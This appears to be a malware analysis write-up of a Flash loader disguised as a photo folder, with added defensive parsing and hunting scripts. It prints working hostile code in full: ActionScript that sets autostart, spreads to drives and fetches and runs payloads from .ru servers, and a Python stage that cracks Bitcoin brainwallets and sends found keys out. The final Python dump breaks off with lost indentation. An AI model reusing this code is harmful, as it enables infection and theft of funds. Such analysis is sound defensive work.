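Today's sample is written in Flash and packaged into an exe with MDM Zinc 3. It uses a folder icon, creates a photo directory in the root of every drive except C:, and copies itself there to lure users into clicking it. It also adds an autostart entry and contacts its backend to download a follow-on payload.
Basic sample information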
Verified: Unsigned
Link date: 4:52 2010/11/3
Publisher: n/a
Company: Soft
Description: Open photo
Product: Photo
Prod version: 1.1.0.4
File version: 1.1.0.4
MachineType: 32-bit
MD5: EAD9542D757366D77F887173A8EEC810
SHA1: 9AA2DFE10C4BA5AA030510E3B1CE17ADA1BE254D
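Packed with UPX.
The icon is the system pictures-folder icon.
Analysis
The sample drops the following files.
It copies itself into the system Start Menu directory and deletes the files it dropped earlier.
After running, it contacts the domain www.psiassess.ru.
The dropped files were extracted:
File name: C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\0.mdd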
MD5: 9eda6ac05d976773bec1a5ac2fc19c3b
C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\1.mdd
MD5: df9ffe8b2b937c3316bbead7821bee5d
C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\2.mdd
MD5: 3a9fff286cf967cfd251324c83bf4921
C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\3.mdd
MD5: 5168f1a61e75eef60cfd9b2356b2a033
C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\4.mdd
MD5: 5379c9da4eecad6bd87e16fa9bf77793
C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\~swd1.dat
MD5: a7f1d0df5413d14fab8566df4fdde1d9
C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\~swd1.swf
MD5: eeb736d65f89dbabdc5670f801c6d53b
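Viewing them in pestudio shows that 0.mdd through 4.mdd are dynamic libraries with the PDB paths below, each providing two exported functions. A search shows they are components of MDM Zinc 3.0, a tool used to package Flash into an exe.
Exported functions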
GetNumPlugins
GetPluginInstance
PDB paths
0.mdd,c:\MDM\Zinc3\mdmdialogs\Release\mdm_dialogs.pdb
1.mdd,c:\MDM\Zinc3\mdmfilesystem\Release\mdm_FileSystem.pdb
2.mdd,c:\MDM\Zinc3\mdm_forms\Release\mdm_forms.pdb
3.mdd,c:\MDM\Zinc3\mdmhttp\Release\mdm_HTTP.pdb
4.mdd,c:\MDM\Zinc3\mdmsystem\Release\mdm_System.pdb
swd1.dat and swd1.swf are Flash files; we reverse them with the ffdec tool.
Flash uses the ActionScript language, which is similar to JavaScript.
The decompiled ActionScript code is as follows:
mdm.Forms.MainForm.visible = true;
mdm.Forms.MainForm.alpha = 1;
mdm.Forms.MainForm.hideCaption(true);
System.useCodepage = true;
var go = "none";
var timer = 1;
var num = 0;
var win = 2;
name = mdm.Application.filename;
mdm.System.Registry.saveString(2,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run","Startup",mdm.System.Paths.programs + name);
function loadCommand()
{
    site = ["profbase.ru","psiassess.ru","topstatist.ru"];
    loadVariables("http://www." + site[Math.floor(Math.random() * 3)] + "/photo.txt?" + getTimer(),"button");
}
function copyFile()
{
    if(num == 9)
    {
        num = 0;
    }
    else
    {
        num++;
    }
    disk = ["D","E","F","G","H","I","J","K","L","M"];
    if(mdm.FileSystem.fileExists(disk[num] + ":\\Photo\\" + name) == false)
    {
        mdm.FileSystem.makeFolder(disk[num] + ":\\Photo");
        mdm.FileSystem.copyFile(mdm.System.Paths.programs + name,disk[num] + ":\\Photo\\" + name);
    }
}
function loadComplete()
{
    if(mdm.FileSystem.getFileDate(mdm.Application.path + name) == button.date)
    {
        loadVariables("http://www.profbase.ru/photo.php?pc=" + mdm.System.computerName + " " + mdm.System.winVerString,"");
    }
    keywords = button.keyword.split(",");
    urls = button.url.split(",");
    clearInterval(load);
    clearInterval(interval);
    interval = setInterval(command,1000);
    loadFile();
}
function command()
{
    if(timer == button.time / 1000)
    {
        timer = 1;
    }
    else
    {
        timer = timer + 1;
    }
    mdm.Application.bringToFront();
    windowList = mdm.System.getWindowList();
    var _loc1_ = 0;
    while(_loc1_ < windowList.length)
    {
        if(windowList[_loc1_][0] == "Пуск" || windowList[_loc1_][0] == "Start")
        {
            win = _loc1_ + 1;
            break;
        }
        _loc1_ = _loc1_ + 1;
    }
    _loc1_ = 0;
    while(_loc1_ < keywords.length)
    {
        windowList[win][0] = windowList[win][0].toLowerCase();
        if(windowList[win][0].indexOf(keywords[_loc1_]) > -1)
        {
            key = keywords[_loc1_];
            go = urls[_loc1_];
            num = _loc1_;
            break;
        }
        go = "none";
        _loc1_ = _loc1_ + 1;
    }
    if(go != "none")
    {
        mdm.Forms.MainForm.width = button.w * 1;
        mdm.Forms.MainForm.height = button.h * 1;
        mdm.Forms.MainForm.y = windowList[win][2] * 1 + button.x * 1;
        mdm.Forms.MainForm.x = windowList[win][3] * 1 + button.y * 1;
    }
    else
    {
        mdm.Forms.MainForm.width = 1;
        mdm.Forms.MainForm.height = 1;
    }
}
function loadFile()
{
    if(button.http.length > 10)
    {
        var _loc1_ = new mdm.HTTP();
        _loc1_.onBinaryTransferComplete = function()
        {
            if(button.http.indexOf(".swf") > -1)
            {
                mdm.Application.createForm("flash","transparent",button.c,1,1,1,1);
                mdm.FileSystem.deleteFile(button.c);
            }
            else
            {
                mdm.System.exec(button.c);
            }
        };
        _loc1_.getFile(button.http,"","",button.c);
    }
}
if(mdm.Application.path != mdm.System.Paths.programs)
{
    mdm.FileSystem.copyFile(mdm.Application.path + name,mdm.System.Paths.programs + name);
    mdm.Dialogs.BrowseFile.filterList = "Images|*.bmp;*.jpg;*.png;*.gif";
    open = mdm.Dialogs.BrowseFile.show();
    if(open != "false")
    {
        mdm.System.exec(open);
    }
    mdm.Application.exit();
}
else
{
    load = setInterval(loadCommand,10000);
    copy = setInterval(copyFile,10000);
}
button.onPress = function()
{
    go = "none";
};
mdm.Application.onAppChangeFocus = function(focus)
{
    if(focus.status == "true")
    {
        if(go != "none")
        {
            mdm.System.exec("http://" + go,"_self");
        }
        delete keywords.num;
        delete urls.num;
        go = "none";
    }
};
The main malicious behaviours are:
1. Sets autostart in the registry
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Startup"="C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\1.exe"
2. Creates a photo directory on drives D through M and copies itself there
3. Requests the following three domains
http://www.profbase.ru/photo.txt
http://www.psiassess.ru/photo.txt
http://www.topstatist.ru/photo.txt
The content at this link is:
&ver=3.0&
&time=21600000&
&x=1&
&y=1&
&w=1&
&h=1&
&keyword=nil&
&url=nil&
&keywords=nil&
&urls=nil&
&http=http://194.147.84.197/python18&
&c=file5.exe&
&loadurl=http://194.147.84.197/python18&
&loadpc=file5.exe&
&date=21.01.2010&
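The tasking file can be parsed the same way the loader's loadVariables() call consumes it, which makes it easy to pull the download URL and indicators out of a captured photo.txt. This is an added example, not code from the sample or the original post; the function names parse_loadvars and triage are assumptions of the example, and the field handling follows the decompiled loadFile() and command() shown above.

```python
from urllib.parse import unquote, urlsplit

# photo.txt body as listed in this write-up.
PHOTO_TXT = """\
&ver=3.0&
&time=21600000&
&x=1&
&y=1&
&w=1&
&h=1&
&keyword=nil&
&url=nil&
&keywords=nil&
&urls=nil&
&http=http://194.147.84.197/python18&
&c=file5.exe&
&loadurl=http://194.147.84.197/python18&
&loadpc=file5.exe&
&date=21.01.2010&
"""


def parse_loadvars(body):
    """Parse loadVariables()-style text: '&'-separated, URL-encoded key=value pairs."""
    fields = {}
    for token in body.replace("\r", "").replace("\n", "").split("&"):
        key, sep, value = token.partition("=")
        if sep and key:
            fields[unquote(key)] = unquote(value)
    return fields


def triage(fields):
    """Summarise what the decompiled loader does with one tasking file."""
    url = fields.get("http", "")
    report = {"download": None, "save_as": None, "action": "none",
              "hosts": set(), "time_ms": None, "redirects": []}
    # loadFile(): nothing is fetched unless button.http is longer than 10 chars.
    if len(url) > 10:
        report["download"] = url
        report["save_as"] = fields.get("c", "")
        # '.swf' in the URL -> mdm.Application.createForm(), otherwise mdm.System.exec().
        report["action"] = "load_swf" if ".swf" in url else "exec"
    # Hosts worth blocking or searching for in proxy logs.
    for name in ("http", "loadurl"):
        try:
            host = urlsplit(fields.get(name, "")).hostname
        except ValueError:
            host = None
        if host:
            report["hosts"].add(host)
    # button.time is the counter limit used in command(), in milliseconds.
    if fields.get("time", "").isdigit():
        report["time_ms"] = int(fields["time"])
    # command(): keywords[i] found in a window title selects urls[i].
    keywords = fields.get("keyword", "").split(",")
    urls = fields.get("url", "").split(",")
    report["redirects"] = [(k, u) for k, u in zip(keywords, urls) if k and u]
    return report


if __name__ == "__main__":
    for key, value in sorted(triage(parse_loadvars(PHOTO_TXT)).items()):
        print(f"{key}: {value}")
```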
Requesting http://194.147.84.197/python18 returns an exe packaged with PyInstaller.
The sample's information is:
63e104fb8a1906ed70a4baf3f2672a70
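The host-side behaviours listed above (the Run value, the \Photo copies and the Zinc temp files) can be turned into a small hunting check over collected registry values and file listings. This is an added example, not part of the original analysis; the function names, the sample inventory and the generalised temp-directory pattern are assumptions, built from the values shown on this page.

```python
import ntpath
import re

RUN_SUFFIX = r"\software\microsoft\windows\currentversion\run"
# An exe sitting directly in Start Menu\Programs (where shortcuts normally live).
STARTMENU_EXE = re.compile(r"\\Start Menu\\Programs\\[^\\]+\.exe$", re.I)
# copyFile() only walks drive letters D through M.
PHOTO_COPY = re.compile(r"^[D-M]:\\Photo\\[^\\]+\.exe$", re.I)
# Generalised from the single observed directory 'wrd-b70-9f8-13694c.~lk' (assumption).
ZINC_TEMP = re.compile(r"\\Temp\\[^\\]+\.~lk\\(?:\d+\.mdd|~swd\d+\.(?:dat|swf))$", re.I)

# Constructed inventory: the Run value and temp paths are the ones shown in this
# write-up; the remaining rows are made-up benign or out-of-scope entries.
SAMPLE_RUN_VALUES = [
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Startup",
     r"C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\1.exe"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     r"C:\Program Files\Example\updater.exe"),
]
SAMPLE_PATHS = [
    r"D:\Photo\1.exe",
    r"E:\Photo\holiday.jpg",
    r"C:\Photo\1.exe",
    r"C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\0.mdd",
    r"C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\4.mdd",
    r"C:\Users\Administrator\AppData\Local\Temp\wrd-b70-9f8-13694c.~lk\~swd1.swf",
]


def check_run_values(run_values):
    """Flag Run values that start an exe placed directly in Start Menu\\Programs."""
    findings = []
    for key, name, data in run_values:
        if not key.lower().endswith(RUN_SUFFIX):
            continue
        target = data.strip('"')
        if STARTMENU_EXE.search(target):
            # The sample names its value "Startup"; other names are a weaker hit.
            rule = "run_startup_value" if name.lower() == "startup" else "run_startmenu_exe"
            findings.append((rule, f"{key}\\{name} -> {target}"))
    return findings


def check_paths(paths):
    """Flag <D..M>:\\Photo\\*.exe copies and Zinc unpack directories under Temp."""
    findings, zinc_dirs = [], {}
    for path in paths:
        if PHOTO_COPY.match(path):
            findings.append(("photo_copy", path))
        elif ZINC_TEMP.search(path):
            # The post notes these files are deleted again, so this is a
            # transient artifact: expect it mainly in EDR file-create telemetry.
            folder, leaf = ntpath.split(path)
            zinc_dirs.setdefault(folder, []).append(leaf)
    for folder, leaves in zinc_dirs.items():
        findings.append(("zinc_temp_dir", f"{folder} ({len(leaves)} files)"))
    return findings


def hunt(run_values, paths):
    """Return (rule, evidence) tuples for one host inventory."""
    return check_run_values(run_values) + check_paths(paths)


if __name__ == "__main__":
    for rule, evidence in hunt(SAMPLE_RUN_VALUES, SAMPLE_PATHS):
        print(f"[{rule}] {evidence}")
```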
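Extracting the Python script from this sample shows that it was packaged at 2014-04-30 13:54:04. I have not analysed what this Python code does; I will look at it more closely when I have time.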
# uncompyle6 version 3.9.0
# Python bytecode version base 2.7 (62211)
# Decompiled from: Python 2.7.13 |Continuum Analytics, Inc.| (default, May 11 2017, 13:17:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: address-in-addresses-26.py
# Compiled at: 2014-04-30 13:54:04
import hashlib, ctypes, ctypes.util, sys, os, glob, ssl, time, zlib, gzip, bz2, io, re, gc, json, pycurl, psutil, string, bisect, platform, threading, smtplib, winreg as reg, multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
import random
from random import choice, sample, randint, randrange

def resource_path(relative_path):
    try:
        base_path = sys._MEIPASS
    except Exception:
        base_path = os.path.abspath('.')

    return os.path.join(base_path, relative_path)

libeay32 = ctypes.cdll.libeay32

def check_result(val, func, args):
    if val == 0:
        raise ValueError
    else:
        return ctypes.c_void_p(val)

libeay32.EC_KEY_new_by_curve_name.restype = ctypes.c_void_p
libeay32.EC_KEY_new_by_curve_name.errcheck = check_result

class KEY():

    def __init__(self):
        NID_secp256k1 = 714
        self.k = libeay32.EC_KEY_new_by_curve_name(NID_secp256k1)
        self.compressed = False
        self.POINT_CONVERSION_COMPRESSED = 2
        self.POINT_CONVERSION_UNCOMPRESSED = 4

    def __del__(self):
        if libeay32:
            libeay32.EC_KEY_free(self.k)
        self.k = None
        return

    def generate(self, secret=None):
        if secret:
            self.prikey = secret
            bn = libeay32.BN_new()
            priv_key = libeay32.BN_bin2bn(secret, 32, bn)
            group = libeay32.EC_KEY_get0_group(self.k)
            pub_key = libeay32.EC_POINT_new(group)
            bn_ctx = libeay32.BN_CTX_new()
            libeay32.EC_POINT_mul(group, pub_key, priv_key, None, None, bn_ctx)
            libeay32.EC_KEY_set_private_key(self.k, priv_key)
            libeay32.EC_KEY_set_public_key(self.k, pub_key)
            libeay32.EC_POINT_free(pub_key)
            libeay32.BN_free(bn)
            libeay32.BN_CTX_free(bn_ctx)
            return self.k
        else:
            return libeay32.EC_KEY_generate_key(self.k)
        return

    def get_pubkey(self):
        size = libeay32.i2o_ECPublicKey(self.k, 0)
        mb = ctypes.create_string_buffer(size)
        libeay32.i2o_ECPublicKey(self.k, ctypes.byref(ctypes.pointer(mb)))
        return mb.raw

    def get_secret(self):
        bn = libeay32.EC_KEY_get0_private_key(self.k)
        bytes = (libeay32.BN_num_bits(bn) + 7) / 8
        mb = ctypes.create_string_buffer(bytes)
        n = libeay32.BN_bn2bin(bn, mb)
        return mb.raw.rjust(32, chr(0))

    def set_compressed(self, compressed):
        self.compressed = compressed
        if compressed:
            form = self.POINT_CONVERSION_COMPRESSED
        else:
            form = self.POINT_CONVERSION_UNCOMPRESSED
        libeay32.EC_KEY_set_conv_form(self.k, form)

def dhash(s):
    return hashlib.sha256(hashlib.sha256(s).digest()).digest()

def rhash(s):
    h1 = hashlib.new('ripemd160')
    h1.update(hashlib.sha256(s).digest())
    return h1.digest()

b58_digits = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'

def base58_encode(n):
    l = []
    while n > 0:
        n, r = divmod(n, 58)
        l.insert(0, b58_digits[r])

    return ('').join(l)

def base58_decode(s):
    n = 0
    for ch in s:
        n *= 58
        digit = b58_digits.index(ch)
        n += digit

    return n

def base58_encode_padded(s):
    res = base58_encode(int('0x' + s.encode('hex'), 16))
    pad = 0
    for c in s:
        if c == chr(0):
            pad += 1
        else:
            break

    return b58_digits[0] * pad + res

def base58_decode_padded(s):
    pad = 0
    for c in s:
        if c == b58_digits[0]:
            pad += 1
        else:
            break

    h = '%x' % base58_decode(s)
    if len(h) % 2:
        h = '0' + h
    res = h.decode('hex')
    return chr(0) * pad + res

def base58_check_encode(s, version=0):
    vs = chr(version) + s
    check = dhash(vs)[:4]
    return base58_encode_padded(vs + check)

def base58_check_decode(s, version=0):
    k = base58_decode_padded(s)
    v0, data, check0 = k[0], k[1:-4], k[-4:]
    check1 = dhash(v0 + data)[:4]
    if check0 != check1:
        raise BaseException('checksum error')
    if version != ord(v0):
        raise BaseException('version mismatch')
    return data

def gen_eckey(passphrase=None, secret=None, pkey=None, compressed=False, rounds=1, version=0):
    k = KEY()
    if passphrase:
        secret = passphrase.encode('utf8')
        for i in xrange(rounds):
            secret = hashlib.sha256(secret).digest()

    if pkey:
        secret = base58_check_decode(pkey, 128 + version)
        compressed = len(secret) == 33
        secret = secret[0:32]
    k.generate(secret)
    k.set_compressed(compressed)
    return k

def get_addr(k, version=0):
    pubkey = k.get_pubkey()
    secret = k.get_secret()
    hash160 = rhash(pubkey)
    addr = base58_check_encode(hash160, version)
    payload = secret
    if k.compressed:
        payload = secret + chr(1)
    pkey = base58_check_encode(payload, 128 + version)
    return (addr, pkey)

def reencode(pkey, fromversion=0, toversion=48):
    payload = base58_check_decode(pkey, 128 + fromversion)
    secret = payload
    pkey = base58_check_encode(payload, 128 + toversion)
    return get_addr(gen_eckey(pkey=pkey, compressed=True, version=toversion), version=toversion)

def getUserAgent():
    platform = choice(['Macintosh', 'Windows', 'X11'])
    if platform == 'Macintosh':
        os = choice(['68K', 'PPC'])
    else:
        if platform == 'Windows':
            os = 'Windows NT ' + choice(['5.0', '5.1', '5.2', '6.0', '6.1', '6.2', '6.3', '10.0'])
        else:
            if platform == 'X11':
                os = choice(['Linux i686', 'Linux x86_64'])
    browser = choice(['chrome', 'firefox', 'ie'])
    if browser == 'chrome':
        webkit = str(randint(500, 599))
        version = str(randint(0, 24)) + '.0' + str(randint(0, 1500)) + '.' + str(randint(0, 999))
        return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, live Gecko) Chrome/' + version + ' Safari/' + webkit
    if browser == 'firefox':
        year = str(randint(2000, 2020))
        month = str(randint(1, 12))
        if len(month) == 1:
            '0' + month
        day = str(randint(1, 30))
        if len(day) == 1:
            '0' + day
        gecko = year + month + day
        version = str(randint(1, 15)) + '.0'
        return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version
    if browser == 'ie':
        version = str(randint(1, 10)) + '.0'
        engine = str(randint(1, 5)) + '.0'
        token = choice([choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; ', ''])
        return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')'

def curl(url, timeout=35, ctimeout=30):
    try:
        get = pycurl.Curl()
        get.setopt(pycurl.URL, url)
        get.setopt(pycurl.USERAGENT, getUserAgent())
        get.setopt(pycurl.HTTPHEADER, ['Accept: text/html, image/jpeg, */*;q=0.4'])
        bytes = io.BytesIO()
        get.setopt(pycurl.WRITEFUNCTION, bytes.write)
        get.setopt(pycurl.FOLLOWLOCATION, 1)
        get.setopt(pycurl.MAXREDIRS, 5)
        get.setopt(pycurl.SSL_VERIFYPEER, 0)
        get.setopt(pycurl.SSL_VERIFYHOST, 0)
        get.setopt(pycurl.CONNECTTIMEOUT, ctimeout)
        get.setopt(pycurl.TIMEOUT, timeout)
        get.perform()
        code = get.getinfo(pycurl.RESPONSE_CODE)
        return bytes.getvalue()
    except pycurl.error as e:
        return str(e.args[0])

def encrypt(data):
    try:
        chars = 'zxcvbnmasdfghjklqwertyuiop'
        c = list(chars)
        c[::2], c[1::2] = c[1::2], c[::2]
        chars_replace = ('').join([ str(i) for i in c ])
        table = string.maketrans(chars, chars_replace)
        return data.translate(table)
    except:
        return data

def generate_wallet(phrase='', compressed=choice([False, True])):
    try:
        return get_addr(gen_eckey(passphrase=phrase, compressed=compressed)) + (phrase,)
    except:
        pass

def check_addresses(u, t, ver, phrases, wallets):
    try:
        win = '0'
        keys = []
        addresses = {}
        try:
            for file in reversed(['addresses01.zl1', 'addresses001.zl1', 'addresses0001.zl1', 'addresses00000001.zl1']):
                try:
                    path = os.path.join(os.environ['TEMP'], file)
                    with open(path, 'rb') as (f):
                        addresses = zlib.decompress(f.read())
                    break
                except:
                    if os.path.isfile(resource_path('addresses.zl1')):
                        path = resource_path('addresses.zl1')
                    else:
                        path = os.path.join(os.path.join(os.path.realpath(sys.path[0]), '.'), 'addresses.zl1')
                    with open(path, 'rb') as (f):
                        addresses = zlib.decompress(f.read())

            addresses = json.loads(addresses)
        except:
            pass

        if len(addresses) < 80000:
            return
        addresses['FYM'] = addresses['FYM'].replace('ZEHnszC$', '')
        addresses['6Qa'] = addresses['6Qa'].replace('FeudRUt$', '')
        addresses['4p5'] = addresses['4p5'].replace('cGy5DZm$', '')
        adr = str(len(addresses))[:4]
        try:
            keys0 = os.environ['TEMP'] + '\\keys0.txt'
            if os.path.isfile(keys0):
                with open(keys0, 'rb') as (f):
                    keys.extend(list(set(f.read().split())))
            win = platform.machine()[-4:] + platform.win32_ver()[0][0:4] + platform.node()[-2:]
        except:
            pass

        for i in xrange(len(phrases)):
            try:
                if len(wallets) < 1:
                    try:
                        lot = set([ phrases.pop() for g in xrange(1000) ])
                        pool = ThreadPool()
                        output = pool.map(generate_wallet, lot)
                        pool.close()
                        pool.join()
                        wallets.extend(output)
                    except:
                        if phrases:
                            wallets.append(generate_wallet(phrases.pop()))

                wallet = wallets.pop()
                address = wallet[0]
                key = wallet[1]
                phrase = wallet[2]
                if '$' + address[4:11] + '$' in addresses.get(address[1:4], ''):
                    keys.append(encrypt(ver + address + '$' + key + win + adr + '$' + phrase.replace(' ', '%20')))
                    keys = list(set(keys))
                if not i % 1001 and len(keys):
                    keys = sample(keys, len(keys))
                    keys = [ k for k in keys if k.strip() != '' ]
                    curl('cpitest.ru/address.php?message=' + keys[0])
                    if curl('catell.ru/address.php?message=' + keys[0]) == '0':
                        keys.pop(0)
                if not i % 20001:
                    with open(keys0, 'wb') as (f):
                        f.write(('\n').join(keys))
                if not i % 100:
                    time.sleep(0.01)
            except:
                pass

    except:
        pass

def load_addresses(url):
    try:
        for file in ['addresses01.zl1', 'addresses001.zl1', 'addresses0001.zl1', 'addresses00000001.zl1']:
            time.sleep(5)
            try:
                path = os.path.join(os.environ['TEMP'], file)
                with open(path, 'rb') as (f):
                    strings = zlib.decompress(f.read())
                del strings
            except:
                with open(path, 'wb') as (f):
                    f.write(curl(url + file, 3060, 3000))

    except:
        pass

def choices(items, total, retry=0):
    try:
        keys = []
        s = sum(items.values())
        rnds = [ random.random() * s for i in xrange(total) ]
        items = sorted(items.items(), key=(lambda item: item[1]), reverse=True)
        for rnd in rnds:
            for i, w in enumerate(items):
                rnd -= w[1]
                if rnd < 0:
                    if w[0] not in keys:
                        keys.append(w[0])
                    break

        return keys
    except:
        pass

def per(item, total):
    return int(float(item) / total * 100)

def get_phrases(n, c, d):
    try:
        t = time.time()
        phrases = set()
        blackphrases = set()
        blacklinks = set()
        links = set((',wikipedia.org,wikileaks.org,wikiart.org,wikifur.com,wikinfo.org,wikitravel.org,wikirank.net,fandom.com,allmusic.com,britannica.com,encyclopedia.com,citizendium.org,infoplease.com,dotdashmeredith.com,orthodoxwiki.org,howstuffworks.com,library.wolfram.com,almanac.com,si.edu,openlibrary.org,presidency.ucsb.edu,catalog.loc.gov,medlineplus.gov,msdmanuals.com,hyperhistory.com,lib.umich.edu,nolo.com,findlaw.com,cia.gov,webopedia.com,edmunds.com,onelook.com,pantheon.org,forvo.com,bbc.com,bookfinder.com,realestateabc.com,medlineplus.gov,lexicool.com,onlineconversion.com,pdr.net,owl.purdue.edu,sports-reference.com,factcheck.org,worldcat.org,ourdocuments.gov,vos.ucsb.edu,bartleby.com').replace(',', ',http://www.')[1:].split(','))
        temp = os.environ['TEMP']
        for file in [('\\links.zl1', links), ('\\blacklinks.zl1', blacklinks), ('\\phrases.' + str(c) + '.zl1', phrases), ('\\blackphrases.' + str(c) + '.zl1', blackphrases)]:
            if os.path.isfile(temp + file[0]):
                with open(temp + file[0], 'rb') as (f):
                    file[1].update(zlib.decompress(f.read()).split('\r\n'))

        for i in xrange(1, 50000000):
            time.sleep(0.2)
            try:
                if int(time.strftime('%Y%m%d', time.localtime())) > d:
                    break
                if not links:
                    return
                link = sample(links, 1)[0]
                link = link.lower()
                domain = re.findall('https?://([-\\w.]*)/', link + '/', re.IGNORECASE)[0]
                if link[11:16] + link[::-len(link) // 3] in blacklinks and len(links) > 50:
                    links.discard(link)
                else:
                    if len(links) > 50:
                        blacklinks.add(link[11:16] + link[::-len(link) // 3])
                    html = curl(link, 5, 2)
                    html = re.sub('href=["\\\']?//|href=["\\\']?/', 'href="http://' + domain + '/', html)
                    hrefs = re.findall('href="(https?://[-.\\w/]{,90}[-\\w/]{,5})"', html)
                    hrefs = set(filter((lambda href: not re.findall('\\.(gif|ico|png|js|css|jpg|svg|ttf|woff)$', href, re.IGNORECASE)), hrefs))
                    hrefs = set(map((lambda href: href.lower()), hrefs))
                    if hrefs:
                        links.discard(link)
                    for href in hrefs:
                        blacklink = href[11:16] + href[::-len(href) // 3]
                        if blacklink not in blacklinks:
                            links.add(href)

                    hrefs.clear()
                    if len(links) > 200000:
                        links -= set(sample(links, 20000))
                    if len(blacklinks) > 500000:
                        blacklinks -= set(sample(blacklinks, 50000))
                    if len(phrases) > 20000:
                        phrases -= set(sample(phrases, 2000))
                    if len(blackphrases) > 100000:
                        blackphrases -= set(sample(blackphrases, 10000))
                    html = re.sub('\\&\\#039;', "'", html)
                    lines = re.findall("(<title>|<h\\d>|<td>|<td [^>]*>|<p>|<p [^>]*>|<br ?/?>|\\r|\\n|[.!?]) *((?:[a-z']+ ){" + str(c - 1) + "}(?:[a-z']+[.,!?]?)) *(</title>|</h\\d>|</td></p>|<br ?/?>|\\r|\\n|[.,!?])", html, re.IGNORECASE)
                    lines = {line[1] for line in lines}
                    if len(lines) > 10:
                        for line in lines:
                            blackphrase = line[::-len(line) // 10]
                            if blackphrase in blackphrases:
                                continue
                            blackphrases.add(blackphrase)
                            phrases.add(line)

                    if not i % 10 and len(phrases) > 100:
                        send = sample(phrases, 30)
                        if curl('cpitest.ru/phrases.php?file=phrases.' + str(c) + '.txt&message=' + (';').join(send).replace(' ', '%20')) == '0':
                            phrases.difference_update(send)
                    if not i % 100:
                        for file in [('\\links.zl1', links), ('\\blacklinks.zl1', blacklinks), ('\\phrases.' + str(c) + '.zl1', phrases), ('\\blackphrases.' + str(c) + '.zl1', blackphrases)]:
                            with open(temp + file[0], 'wb') as (f):
                                f.write(zlib.compress(('\r\n').join(file[1]), 1))

            except:
                pass

    except:
        pass

if __name__ == '__main__':
multiprocessing.freeze_support()
alcohols = 'Abricontine, Absinthe, Advocat, Ale, Alpina, Amaretto, Amber, Amontiliado, Angostura, Anisette, Annata, Beer, Bellini, Bodega, Bourbon, Brandy, Bristol, Calvados, Campari, Cantina, Chablis, Chambraise, Champagne, Cider, Cocktail, Cognac, Colada, Cosmopolitan, Daikiri, Damiana, Dandelion, Digestif, Drambuie, Espumoso, rangelico, Garrafeira, Gin, Ginger, Harvey, Hennessy, Highball, Imbottigliatto, Izarra, Jagermeister, Jerez, Julep, Kahlua, Lager, Landwein, Liqueur, Malaga, Martini, Metodo, Mezcal, Mescal, Mohito, Mojito, Moonshine, Perlwein, Pisko, Porto, Portwein, Punch, Rose, Rum, Sake, Scheidam, Screwdriver, Shandy, Sheridan, Sheridans, Sherry, Spumante, Steinhager, Tequila, Tonic, Vermouth, Vinicola, Vodka, Weinprobe, Whiskey, Whisky, Wine, Wishniak'
dogs = 'Admiral, Aidan, Alf, Alfred, Anakin, Apollo, Archie, Artemis, Atreyu, Baldrick, Balfour, Baloo, Bandit, Barney, Baron, Bastian, Bear, Benedict, Benny, Benson, Bentley, Bigy, Bimbo, Biscuit, Blade, Bliss, Blitz, Boomer, Boots, Brick, Brisk, Bruno, Buddy, Bullet, Buster, Butter, Caesar, Calder, Calvin, Carlin, Carter, Casper, Celt, Charles, Charley, Charlie, Chase, Chester, Chief, Chip, Clyde, Cooper, Corbin, Cosmo, Crown, Crystall, Damien, Darby, Devin, Dexter, Dingo, Disaster, Dobby, Dolan, Dominique, Doyle, Duke, Dusk, Dusty, Elliot, Emmett, Eowyn, Falkor, Faramir, Finn, Force, Forrest, Fox, Frank, Frankie, Fred, Friendly, Gaius, Gandalf, Garfield, Gentle, George, Ghost, Gizmo, Grape, Gus, Han, Hank, Harley, Harry, Hazel, Henry, Hide, Hobbes, Hobbit, Hudson, Humble, Iron, Jack, Jackson, Jake, Jareth, Jarvis, Jasper, Jax, Jay, Jerry, Jewel, Joffrey, Joker, Jordan, Journey, Junior, Kael, Kaydan, Kingston, Kobe, Ladd, Lark, Larson, Laser, Leo, Light, Lilo, Lipton, Logan, Loki, Lollipop, Louie, Lucky, Ludo, Luke, Lumpy, Luther, Magic, Manfred, Marley, Mars, Marty, Maui, Max, McFly, Melvin, Mercy, Merlin, Mick, Mickey, Midnight, Milo, Moose, Mowgli, Murphy, Murray, Neal, Newton, Nick, Noise, Nolan, Norman, Odo, Olaf, Oliver, Ollie, Oreo, Orion, Osborne, Oscar, Otis, Otto, Ozzy, Paddy, Patton, Peach, Percival, Percy, Petal, Precious, Prince, Pumpkin, Punch, Ralph, Ramsey, Raygun, Reiner, Remi, Rocky, Romeo, Ronan, Rowan, Rufus, Rylan, Salem, Sam, Sammy, Sauron, Scully, Sebastian, Septimus, Shakespeare, Sheldon, Sheriff, Sherlock, Sherman, Simba, Simon, Smith, Spate, Spenser, Spicy, Spike, Spock, Stanley, Stream, Strike, Sunny, Swen, Sylvester, Taddle, Teddy, Theo, Thomas, Thor, Toby, Tommy, Tucker, Tyler, Tyrian, Viscount, Vulcan, Waite, Wallace, Walter, Watson, Whisper, Whistle, Wild, William, Winnie, Wolf, Zac, Zack, Zeus, Ziggy'
